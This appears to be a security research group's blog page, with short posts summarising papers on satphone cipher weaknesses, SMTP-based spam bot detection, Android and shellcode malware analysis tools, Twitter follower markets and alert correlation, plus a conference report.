A Security Analysis of Two Satphone Standards

There is a rich body of work related to the security aspects of cellular mobile phones, in particular with respect to the GSM and UMTS systems. Similarly to GSM, there exist two standards for satellite telephony called GMR-1 and GMR2. These two standards handle the way satellite phones (abbr. satphones) and a satellite communicate with each other. For example, the standard dictates which frequencies and protocols are to be used between both parties. Even though a niche market compared to the G2 and G3 mobile systems, there are several 100,000 satphone subscribers worldwide. Given the sensitive nature of some of their application domains (e.g., natural disaster areas or military campaigns), security plays a particularly important role for satphones. One of the most important aspects is the encryption algorithm that is used to deny eavesdropping from a third party. This is especially important for satellite telephony since the transmitted data is broadcasted to a large region. For example, the data that is sent from a satellite to a phone can be received in an area of several hundreds of kilometers in diameter.

Interestingly, the encryption algorithms are not part of the public documentation for both standards. They are intentionally kept secret. We thus analyzed the encryption systems and were able to completely reverse engineer the encryption algorithms employed. The procedure we used can be outlined as follows:

  1. Retrieve a dump of the firmware (from the firmware updater or the device itself).
  2. Analyze the firmware in a disassembler.
  3. Retrieve the DSP (digital signal processor) code inside the firmware. The DSP is a special co-processor that is used to efficiently implement tasks such as signaling, encoding, but (more importantly) also encryption.
  4. Find the encryption algorithms inside the DSP code.
  5. Translate the cipher code into a higher language representation and perform a cryptanalysis.

We could use existing tools for these tasks (such as the disassemble IDA Pro) but it was also necessary to develop a custom disassembler and tools to analyze the code, and we extended prior work on binary analysis to efficiently identify cryptographic code. In both cases, the encryption was performed in the DSP (digital signal processor) code. Perhaps somewhat surprisingly, we found that the GMR-1 cipher can be considered a proprietary variant of the GSM A5/2 algorithm, whereas the GMR-2 cipher is an entirely new design.

After analyzing both proprietary stream ciphers, we were able to adopt known A5/2 ciphertext-only attacks to the GMR-1 algorithm with an average case complexity of 232 steps. With respect to the GMR-2 cipher, we developed a new attack that is powerful in a known-plaintext setting. In this situation, the encryption key for one session (i.e., one phone call) can be recovered with approximately 50–65 bytes of key stream and a moderate computational complexity. A major finding of our work is that the stream ciphers of the two existing satellite phone systems are considerably weaker than what is state-of-the-art in symmetric cryptography.

We published this work at the 33rd IEEE Symposium on Security and Privacy and the paper won the best paper award at the symposium. You can find more information regarding this topic at http://gmr.crypto.rub.de

Posted in Web Security | Leave a comment

SMTP Dialects, or how to detect bots by looking at SMTP conversations

It is somewhat surprising that, in 2012, we are still struggling fighting spam. In fact, any victory we score against botnets is just temporary, and the spam levels raise again after some time. As an example, the amount of spam received worldwide dropped dramatically when Microsoft shut down the Rustock botnet, but has been rising again since then.

For these reasons, we need new techniques to detect and block spam. Current techniques mostly fall in two categories: content analysis and origin analysis. Content analysis techniques look at what is being sent, and typically analyze the content of an email to see if it is indicative of spam (for example, if it contains words that are frequently linked to spam content). Origin analysis techniques, on the other hand, look at who is sending an email, and flag the email as spam if the sender (for example the IP address the email is coming from) is known to be malicious. Both content analysis and origin analysis techniques fall short and have problems in practice. For instance, content analysis is usually very resource intensive, and cannot be run on every email sent to large, busy mail servers. Also, it can be evaded by carefully crafting the spam email. On the other hand, origin analysis techniques often have coverage problems, and fail to detect as malicious many sources that are actually sending out spam.

In our paper B@BEL: Leveraging Email Delivery for Spam Mitigation, that got presented at the USENIX Security Symposium last August, we propose to look at how emails are sent instead. The idea behind our approach is simple: the SMTP protocol, which is used to send emails on the Internet, follows Postel’s Law, which states: “Be liberal in what you accept, but conservative in what you send”. As a consequence of this, email software developers can come up with their own interpretation of the SMTP protocol, and still be able to successfully send emails. We call these variations of the protocol SMTP dialects. In the paper we show how it is possible to figure out which software (legitimate of malicious) sent a certain email just by looking at the SMTP messages exchanged between the client and the server. We also show how it is possible to enumerate the dialects spoken by spamming bots, and leverage them for spam mitigation.

Although not perfect, this technique allows, if used in conjunction with existing ones, to catch more spam, and it is a useful advancements in the war against spamming botnets.

Posted in Malware Analysis and Detection | Leave a comment

Andrubis: A Tool for Analyzing Unknown Android Applications

Andrubis We are proud to announce that we have released our brand new extension for Anubis: Andrubis. As the name already suggests, Andrubis is designed to analyze unknown apps for the Android platform (APKs), just like Anubis does for Windows executables. The main goal we had in mind when designing Andrubis is the analysis of mobile malware, motivated by the rise of malware on mobile devices, especially smartphones and tablets. The report provided by Andrubis gives the human analyst insight into various behavioral aspects and properties of a submitted app. To achieve comprehensive results, Andrubis employs both static and dynamic analysis approaches.

During the dynamic analysis part an app is installed and run in an emulator. Thorough instrumentation of the Dalvik VM provides the base for obtaining the app’s behavioral aspects. for file operations we track both read and write events and report on the files and the content affected. For network operations we also cover the typical events (open, read, write), the associated endpoint and the data involved. Additionally all traffic transmitted during the sandbox operation is captured and provided as a pcap file. Of course we employ the containment strategies for malicious traffic that have proven their effectiveness with Anubis. Dynamic analysis allows us to detect dynamically registered broadcast receivers that need not be listed before actual execution as well as actually started services. We also capture cellphone specific events, such as phone calls and short messages sent. Taint analysis is used to report on leakage of important data such as the IMEI and also shows the data sink the information is leaked through, including files, network connections and short messages. Invocations of Android’s crypto facilities are logged, too. Finally we report on dynamically loaded code, both on the Dalvik VM level (DEX-files) and on the binary level. The latter include native libraries loaded through JNI.

Additionally, we collect information that can be obtained statically, i.e. without actually executing the app. To begin with, we list the main components an app needs to communicate with the Android OS: activities, services, broadcast receivers and content providers. Going into more detail, information related to the intent-filters declared by these components is also included. We recommend to read the Android framework documentation for a detailed explanation on what these components are and which role they play. Runtime requirements are a further aspect: the report displays both external libraries that are necessary to run the app as well as specific hardware features the app requires. Furthermore, we compare the permissions the user has to grant at installation-time with those actually used by the application. We then provide a detailed list of the method calls that require a certain permission. Finally, we also output all URLs that we were able to find in the app’s byte code.

In order not to reinvent the wheel, we leveraged several existing open source projects in addition to the Android SDK:

Check out the new Andrubis at anubis.iseclab.org and submit your APKs! If you have any questions, bug reports or comments contact us at andrubis@iseclab.org.

Posted in Anubis, Binary Analysis, Malware Analysis and Detection | Leave a comment

Poultry Markets: On the Underground Economy of Twitter Followers

Twitter has become such an important medium that companies and celebrities use it extensively to reach their customers and their fans. Nowadays, creating a large and engaged network of followers can determine the difference between succeeding and failing in marketing. However, creating such a network requires time, especially when the party building it does not have an established reputation among the public.

 For this reason, a number of websites to help Twitter users create a large network of followers have emerged. These websites promise their subscribers to provide followers in exchange for a fee. In addition, some of these services offer to spread promotional messages in the network. We call this phenomenon Twitter Account Markets. We study this phenomenon in our paper “Poultry Markets: On the Underground Economy of Twitter Followers”, that will appear at the SIGCOMM Workshop on Online Social Networks (WOSN) later this year.

 Typically, the services offered by a Twitter Account Market are accessible through a webpage. Customers can buy followers at a rate that is between $20 and $100 for 1,000 followers. In addition, markets typically offer the possibility of having content sent by a certain number of accounts, again in exchange for a fee.

All Twitter Account Markets we analyzed offer both “free” and “premium” versions of their services. While premium accounts pay for their services, the free ones gain followers by giving away their Twitter credentials (a clever way of phishing). Once the market administrator gets the credentials for an account, he can follow other Twitter accounts (that are free or premium customers of the market), or send out “promoted” content (typically spam). For convenience, the market administrator typically authorizes an OAUTH application by using his victim’s stolen credentials. By doing this, he can easily administer a large number of accounts, by leveraging the Twitter API.

 Twitter Account Markets are a big problem on Twitter: first, an account with an inflated number of followers tends to look more trustworthy to the other social network users. Second, these services introduce spam in the network.

 Of course, Twitter does not like this behavior. In fact, they introduced a clause in their Terms of Service that specifically forbids to participate in Twitter Account Markets operations. Twitter periodically suspends the OAuth applications that are used by Twitter Account Markets. However, since the market administrator has the credentials to his victims’ accounts, he can go and authorize a new application, and continue his operation.

 In our paper, we propose techniques to both detect Twitter Account Market victims and customers. We believe that an effective way of mitigating this problem would be to focus on the customers, rather than on the victims. Since participating in a Twitter Account Market violates the terms of service, Twitter could suspend such accounts, and impact the market from the economic side.

Posted in Social Networks | Leave a comment

Shellzer: a tool for the dynamic analysis of malicious shellcode

Last September, I presented Shellzer at RAID 2011 conference. Shellzer is a tool that I developed back in August 2010, that aims to dynamically analyze malicious shellcode. The main goal was to analyze the shellcode samples that have been collected by running Wepawet during these years. Due to the size of our dataset (about 30,000 shellcode samples at that time), an automated approach was clearly needed.

After trying several approaches and tools, I came across PyDbg, a python Win32 debugging abstraction class. By using it, I started to write my own tool to dynamically analyze a given shellcode. My very first attempt consisted in single-step executing the whole shellcode binary. This resulted in having the complete control over the sample’s execution, and being the shellcode a malicious piece of code, it was an ideal feature. But unfortunately, this approach is not feasible to be used in practice. In fact, the number of assembly instructions that have to be executed at run-time is in the order of millions, even if shellcode is commonly few hundreds of bytes long. This is due to the fact that many loops are present, and some of them are executed thousands of times. Moreover, Windows API functions are invoked by the shellcode. These two factors cause a huge overhead for an approach based on single-stepping, and the analysis was consequently lasting several minutes in average.

My research has been focused to find how to avoid to single-step the whole shellcode’s execution, while maintaining the complete control over it. This has proved to be challenging, due to the many evasion techniques that are used by these pieces of code. If you are interested in the details, please read the paper. The output of the analysis currently consists in the detailed trace of the Windows API functions called (with their parameters and return value), the Windows DLLs that have been loaded, and the list of the URLs contacted by the shellcode. Furthermore, Shellzer supports the analysis of shellcode samples extracted from malicious PDF documents, other than those detected in web-based drive-by-download attacks.

Starting from November 2011, this tool started to be used by Wepawet. When a shellcode is detected, it will be automatically forwarded to the shellcode analyzer and the Shellzer’s report will be included in the main Wepawet’s report. Read this post for more details. Naturally, the tool is not perfect and some samples cannot be analyzed yet. If after submitting a sample to Wepawet, a shellcode is detected and you don’t see the additional shellcode information, it means that something went wrong. Please, don’t hesitate to contact us in case of errors: we need your feedback!

Posted in Binary Analysis, Web Security | Leave a comment

Report from SecurityZone 2011 – The 1st International Security Conference in Colombia (Cali)

Last month I was invited to Cali’s SecurityZone for the 1st International Security Conference of Colombia. Edgar Rojas, CEO of The MuRo Group, brought together 16 well-known and strong international security experts for a 2+1 days of conference in a DEFCON/BlackHat style. Among them, strong personalities such as Ian Amit, Chris John Riley, Stefan Friedli and Chris Nickerson have animated the event by talking of cyberwar attacks, compliance, read team testing and threats modeling.

The numbers alone document the success of this first security event in Colombia: the conference hosted more than 450 attendees from all over Colombia, UK, USA, Venezuela, Brazil, Argentina, and Mexico, and over 2400 people were connected via streaming.

But the SecurityZone’s success is not only a matter of numbers: Among the many conferences I have been in these last days, SecurityZone has been certainly one of the best for their people. The organizers did an excellent job in putting together this event. I won’t forget their cordiality, kindness, friendly and always smiling attitude. At the same time, our attendees were hungry of knowledge, always asking for information and photos :-)

I am now looking forward to SecurityZone 2012, and in the meanwhile follow us on Twitter!

Posted in Conferences | Leave a comment

About Nexat paper in ACSAC 2011

Last week, our group attended ACSAC 2011. The conference was held in Buena Vista Palace, Orlando, Florida. I presented Nexat paper, and the feedbacks were encouraging.

Nexat was a research project in collaboration with Casey Cipriano, and Amir Houmansadr. Nexat tries to solve a problem a typical security administrator nowadays faces. The security administrators are normally overwhelmed with the amount of security alerts their monitoring tools generate. They also cannot keep up with the stream of the events and predict the next security related events. Therefore, the administrators are usually reactive.

The reason for this problem is that the battlefield of security is not even. A simple button hit by an attacker may cause thousands of alerts to be generated on administrators side. Nexat tries to even the field by deducing relationship between different sets of alerts. Nexat is able to detect related alerts (alerts which may be part of the same attack) and uses them to predict the next step of the attack. This way, Nexat lets the administrators to be one step ahead of the attackers. Nexat does not require a priori knowledge about attacks, which makes it able to detect and predict new types of attack as long as they are composed of detectable steps. We used the alerts generated by Snort in iCTF 2008.

Posted in Systems Security | Leave a comment